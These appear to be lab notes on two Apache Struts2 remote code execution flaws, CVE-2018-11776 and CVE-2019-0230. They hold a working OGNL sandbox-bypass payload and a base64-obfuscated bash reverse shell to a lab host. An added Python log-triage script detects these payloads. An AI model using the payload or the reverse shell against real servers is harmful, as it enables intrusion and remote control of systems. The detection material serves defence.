(CVE-2018-11776)(CVE-2019-0230)
Struts2-057 Remote Code Execution Vulnerability (CVE-2018-11776)
Affected versions: Struts2.3 – Struts2.3.34, Struts2.5 – Struts2.5.16

Information gathering: nmap 192.168.85.130 -p 8080 -sV -A

URL-encode the original exploit: ${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

Struts2-059 Remote Code Execution Vulnerability (CVE-2019-0230)
Affected versions: Struts2.3 – Struts2.3.36, Struts2.5 – Struts2.5.20

Information gathering: nmap 192.168.85.130 -p 8080 -sV -A


Reverse shell: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg1LjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
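
Detection side of the two items above, as an added example that is not part of the original notes: a small access-log triage script that URL-decodes each request target (repeatedly, to catch double encoding) and flags the OGNL markers and the `{echo,...}|{base64,-d}` wrapper that appear on this page. The log lines, paths, parameter names and the function names `fully_decode` and `classify` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Markers copied from the OGNL payload and shell command shown on this page.
OGNL_MARKERS = (
    "@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS",
    "getExcludedClasses",
    "setMemberAccess",
    "@java.lang.Runtime@getRuntime",
)
EXPR_OPEN = re.compile(r"[$%]\{")  # ${...} or %{...} expression opener
B64_WRAPPER = re.compile(r"\{echo,[A-Za-z0-9+/=]+\}\|\{base64,-d\}")
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(log_line):
    """Return a list of finding tags for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    target = fully_decode(match.group(1))
    findings = []
    hits = [m for m in OGNL_MARKERS if m in target]
    if hits and EXPR_OPEN.search(target):
        findings.append("ognl:" + ",".join(hits))
    if B64_WRAPPER.search(target):
        findings.append("base64-shell-wrapper")
    return findings


SAMPLE_LOG = [  # constructed lines (not captured traffic), hypothetical paths
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /app/index.action HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /%24%7B%28%23ct.setMemberAccess%28%23dm%29%29%7D/index.action HTTP/1.1" 302 0',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /app/index.action?id=%2525%257B%2523ou.getExcludedClasses%2528%2529.clear%2528%2529%257D HTTP/1.1" 200 90',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /app/x.action?c=%7Becho,Y29uc3RydWN0ZWQ%3D%7D%7C%7Bbase64,-d%7D HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line.split('"')[1][:60])
```

Marker matching of this kind is a triage aid for logs; upgrading past the affected version ranges listed above is the actual fix.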

